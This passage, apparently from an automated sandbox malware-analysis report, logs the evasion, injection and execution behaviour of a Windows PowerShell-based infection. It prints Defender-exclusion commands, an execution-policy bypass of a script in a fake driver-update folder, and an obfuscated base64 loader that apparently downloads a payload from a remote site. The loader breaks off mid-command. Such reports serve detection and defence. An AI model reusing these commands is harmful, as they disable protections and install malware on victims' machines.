                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040F7E2 Sleep,ExitProcess,20_2_0040F7E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D42AD3 str word ptr [eax]2_2_00007FF848D42AD3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,20_2_0041A7D9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1551Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1757Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3301Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6540Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7119Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2568Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7451Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2254Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3561Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3526Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1399Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 4409
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5152
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1760
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1520
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 814
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 6.2 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 9.7 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5540Thread sleep count: 3301 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 6540 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996Thread sleep count: 7119 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996Thread sleep count: 2568 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628Thread sleep count: 7451 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 2254 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792Thread sleep count: 3561 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792Thread sleep count: 3526 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6580Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 1399 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 109 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7356Thread sleep count: 162 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7356Thread sleep time: -81000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7360Thread sleep count: 4409 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7360Thread sleep time: -13227000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7360Thread sleep count: 5152 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7360Thread sleep time: -15456000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 1520 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 814 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,15_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_10006580 FindFirstFileExA,15_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_00418981 memset,GetSystemInfo,21_2_00418981
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: powershell.exe, 00000004.00000002.2802743129.0000012FDD430000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                      Source: powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                      Source: powershell.exe, 00000004.00000002.2828171433.0000012FDD6C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_10004AB4 mov eax, dword ptr fs:[00000030h]15_2_10004AB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00443355 mov eax, dword ptr fs:[00000030h]20_2_00443355
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_1000724E GetProcessHeap,15_2_1000724E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_10002639
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_10002B1C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0043503C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0043BB71
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00434BD8 SetUnhandledExceptionFilter,20_2_00434BD8

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi64_1436.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5236, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1436, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F34008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: BF7008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1075008
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe20_2_00412132
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00419662 mouse_event,20_2_00419662
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + 